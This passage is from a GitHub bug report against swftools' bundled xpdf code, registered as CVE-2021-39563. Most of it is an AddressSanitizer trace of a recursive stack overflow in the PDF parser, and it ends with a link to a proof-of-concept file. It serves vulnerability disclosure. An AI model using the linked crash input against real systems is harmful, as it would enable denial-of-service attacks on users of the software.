CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #61 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #62 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #63 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #64 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #65 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #66 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #67 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #68 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #69 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #70 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #71 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #72 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #73 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #74 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #75 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #76 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #77 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #78 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #79 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #80 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #81 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #82 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #83 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #84 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #85 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #86 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #87 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #88 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #89 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #90 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #91 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #92 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #93 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #94 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #95 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #96 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #97 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #98 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #99 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #100 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #101 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #102 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #103 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #104 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #105 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #106 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #107 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #108 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #109 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #110 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #111 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #112 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #113 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #114 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #115 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #116 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #117 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #118 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #119 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #120 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #121 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #122 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #123 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #124 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #125 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #126 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #127 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #128 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #129 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #130 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #131 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #132 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #133 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #134 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #135 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #136 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #137 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #138 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #139 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #140 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #141 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #142 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #143 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #144 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #145 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #146 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #147 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #148 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #149 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #150 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #151 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #152 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #153 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #154 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #155 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #156 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #157 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #158 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #159 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #160 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #161 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #162 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #163 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #164 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #165 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #166 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #167 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #168 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #169 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #170 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #171 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #172 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #173 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #174 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #175 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #176 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #177 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #178 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #179 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #180 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #181 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #182 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #183 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #184 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #185 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #186 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #187 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #188 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #189 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #190 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #191 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #192 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #193 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #194 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #195 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #196 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #197 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #198 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #199 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #200 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #201 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #202 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #203 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #204 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #205 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #206 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #207 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #208 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #209 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #210 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #211 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #212 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #213 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #214 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #215 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #216 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #217 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #218 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #219 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #220 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #221 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #222 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #223 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #224 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #225 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #226 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #227 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #228 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #229 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #230 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #231 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #232 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #233 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #234 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #235 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #236 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #237 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #238 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #239 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #240 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #241 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #242 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #243 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #244 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #245 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #246 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #247 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #248 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #249 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #250 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #251 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #252 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #253 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #254 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #255 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #256 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #257 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #258 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #259 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #260 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #261 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #262 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #263 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #264 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #265 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #266 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #267 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #268 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #269 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #270 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #271 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #272 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #273 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #274 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #275 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #276 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #277 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #278 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #279 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #280 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #281 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #282 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #283 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #284 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #285 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #286 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #287 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #288 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #289 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #290 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #291 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #292 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #293 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #294 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #295 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #296 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #297 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #298 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #299 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #300 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #301 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #302 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #303 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #304 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #305 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #306 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #307 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #308 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #309 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #310 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #311 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #312 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #313 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #314 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #315 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #316 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #317 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #318 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #319 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #320 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #321 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #322 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #323 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #324 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #325 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #326 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #327 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #328 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #329 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #330 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #331 0x5561d5039ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #332 0x5561d5039ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #333 0x5561d503bbd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #334 0x5561d5032ee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 SUMMARY: AddressSanitizer: stack-overflow ??:0 operator new(unsigned long) ==34903==ABORTING ``` ## POC [stack-overflow-Stream-598.zip](https://github.com/matthiaskramm/swftools/files/5009684/stack-overflow-Stream-598.zip)
A Segmentation fault in xpdf/Stream.cc:598
https://api.github.com/repos/swftools/swftools/issues/98/comments
0
2020-08-01T02:04:36Z
2020-08-01T02:06:51Z
https://github.com/swftools/swftools/issues/98
670,428,844
98
2,572
CVE-2021-39563
